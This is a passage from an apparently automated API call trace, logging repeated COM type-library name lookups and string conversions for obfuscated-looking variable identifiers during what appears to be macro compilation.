lHashVal=0x10ad52, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.027] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.027] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.027] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aAUUA1", lHashVal=0x10ad52, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.027] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.027] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.027] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aAUUA1", lHashVal=0x10ad52, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.027] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.027] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.027] IUnknown:Release (This=0x665ba50) returned 0xd [0069.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10afe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_aAUUA1") returned 14 [0069.027] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aAUUA1", lHashVal=0x10ad52, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.027] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61ee6 | out: _Dst=0x144ec0) returned 0x0 [0069.027] ITypeComp:RemoteBind (in: This=0x665ba60, szName="FAZB1ww", lHashVal=0x107d64, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f3a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FAZB1ww") returned 8 [0069.027] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="FAZB1ww", lHashVal=0x107d64, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f3a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FAZB1ww") returned 8 [0069.028] ITypeComp:RemoteBind (in: This=0x665bd30, szName="FAZB1ww", lHashVal=0x107d64, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FAZB1ww") returned 0x107d64 [0069.028] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="FAZB1ww" | out: _Dst="FAZB1ww") returned 0x0 [0069.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="FAZB1ww") returned 8 [0069.028] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.028] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="FAZB1ww", lHashVal=0x107d64, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.028] IUnknown:Release (This=0x665ba50) returned 0xd [0069.028] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.028] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="FAZB1ww", lHashVal=0x107d64, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.028] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.028] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.028] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="FAZB1ww", lHashVal=0x107d64, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.028] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.028] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.028] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="FAZB1ww", lHashVal=0x107d64, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.028] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f3a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FAZB1ww") returned 8 [0069.028] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="FAZB1ww", lHashVal=0x107d64, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.028] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.028] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61f3a | out: _Dst=0x67c2d40) returned 0x0 [0069.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FAZB1ww") returned 0x107167 [0069.028] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_FAZB1ww" | out: _Dst="_B_var_FAZB1ww") returned 0x0 [0069.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_FAZB1ww") returned 15 [0069.028] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.028] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_FAZB1ww", lHashVal=0x107167, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.028] IUnknown:Release (This=0x665ba50) returned 0xd [0069.028] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.028] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_FAZB1ww", lHashVal=0x107167, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.029] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.029] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.029] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_FAZB1ww", lHashVal=0x107167, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.029] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.029] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.029] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_FAZB1ww", lHashVal=0x107167, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.029] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.029] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.029] IUnknown:Release (This=0x665ba50) returned 0xd [0069.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10b2e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_FAZB1ww") returned 15 [0069.029] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_FAZB1ww", lHashVal=0x107167, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x31004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x31004200000000, pDummy=0x0) returned 0x0 [0069.029] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61f3a | out: _Dst=0x144ec0) returned 0x0 [0069.029] ITypeComp:RemoteBind (in: This=0x665ba60, szName="z1kXGA1B", lHashVal=0x102825, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f0e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="z1kXGA1B") returned 9 [0069.029] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="z1kXGA1B", lHashVal=0x102825, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f0e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="z1kXGA1B") returned 9 [0069.029] ITypeComp:RemoteBind (in: This=0x665bd30, szName="z1kXGA1B", lHashVal=0x102825, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="z1kXGA1B") returned 0x102825 [0069.029] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="z1kXGA1B" | out: _Dst="z1kXGA1B") returned 0x0 [0069.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="z1kXGA1B") returned 9 [0069.029] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.029] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="z1kXGA1B", lHashVal=0x102825, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.029] IUnknown:Release (This=0x665ba50) returned 0xd [0069.030] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.030] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="z1kXGA1B", lHashVal=0x102825, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.030] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.030] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.030] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="z1kXGA1B", lHashVal=0x102825, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.030] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.030] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.030] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="z1kXGA1B", lHashVal=0x102825, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.030] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f0e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="z1kXGA1B") returned 9 [0069.030] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="z1kXGA1B", lHashVal=0x102825, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.030] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.030] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61f0e | out: _Dst=0x67c2d40) returned 0x0 [0069.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_z1kXGA1B") returned 0x10ffed [0069.030] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_z1kXGA1B" | out: _Dst="_B_var_z1kXGA1B") returned 0x0 [0069.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_z1kXGA1B") returned 16 [0069.030] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.030] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_z1kXGA1B", lHashVal=0x10ffed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.030] IUnknown:Release (This=0x665ba50) returned 0xd [0069.030] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.030] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_z1kXGA1B", lHashVal=0x10ffed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.030] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.030] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.030] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_z1kXGA1B", lHashVal=0x10ffed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.030] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.030] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.030] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_z1kXGA1B", lHashVal=0x10ffed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.030] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.030] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.031] IUnknown:Release (This=0x665ba50) returned 0xd [0069.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10b5e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_z1kXGA1B") returned 16 [0069.031] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_z1kXGA1B", lHashVal=0x10ffed, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x47005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x47005800000000, pDummy=0x0) returned 0x0 [0069.031] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61f0e | out: _Dst=0x144ec0) returned 0x0 [0069.031] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HXAAXU", lHashVal=0x10148b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HXAAXU") returned 7 [0069.031] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HXAAXU", lHashVal=0x10148b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HXAAXU") returned 7 [0069.031] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HXAAXU", lHashVal=0x10148b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HXAAXU") returned 0x10148b [0069.031] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="HXAAXU" | out: _Dst="HXAAXU") returned 0x0 [0069.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="HXAAXU") returned 7 [0069.031] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.031] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HXAAXU", lHashVal=0x10148b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.031] IUnknown:Release (This=0x665ba50) returned 0xd [0069.031] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.031] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HXAAXU", lHashVal=0x10148b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.031] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.031] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.031] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HXAAXU", lHashVal=0x10148b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.031] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.031] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.031] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HXAAXU", lHashVal=0x10148b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.032] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HXAAXU") returned 7 [0069.032] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HXAAXU", lHashVal=0x10148b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.032] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.032] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61f8e | out: _Dst=0x67c2d40) returned 0x0 [0069.032] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HXAAXU") returned 0x108f34 [0069.032] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_HXAAXU" | out: _Dst="_B_var_HXAAXU") returned 0x0 [0069.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_HXAAXU") returned 14 [0069.032] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.032] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HXAAXU", lHashVal=0x108f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.032] IUnknown:Release (This=0x665ba50) returned 0xd [0069.032] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.032] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HXAAXU", lHashVal=0x108f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.032] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.032] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.032] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HXAAXU", lHashVal=0x108f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.032] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.033] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.033] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HXAAXU", lHashVal=0x108f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.033] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.033] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.033] IUnknown:Release (This=0x665ba50) returned 0xd [0069.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10b8e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_HXAAXU") returned 14 [0069.033] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HXAAXU", lHashVal=0x108f34, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0) returned 0x0 [0069.033] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61f8e | out: _Dst=0x144ec0) returned 0x0 [0069.033] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XABAxQ", lHashVal=0x10294e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61fb6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XABAxQ") returned 7 [0069.033] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XABAxQ", lHashVal=0x10294e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61fb6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XABAxQ") returned 7 [0069.033] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XABAxQ", lHashVal=0x10294e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.034] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XABAxQ") returned 0x10294e [0069.034] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="XABAxQ" | out: _Dst="XABAxQ") returned 0x0 [0069.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="XABAxQ") returned 7 [0069.034] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.034] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XABAxQ", lHashVal=0x10294e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.034] IUnknown:Release (This=0x665ba50) returned 0xd [0069.034] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.034] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XABAxQ", lHashVal=0x10294e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.034] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.034] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.034] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XABAxQ", lHashVal=0x10294e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.034] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.034] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.034] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XABAxQ", lHashVal=0x10294e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.034] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61fb6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XABAxQ") returned 7 [0069.034] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XABAxQ", 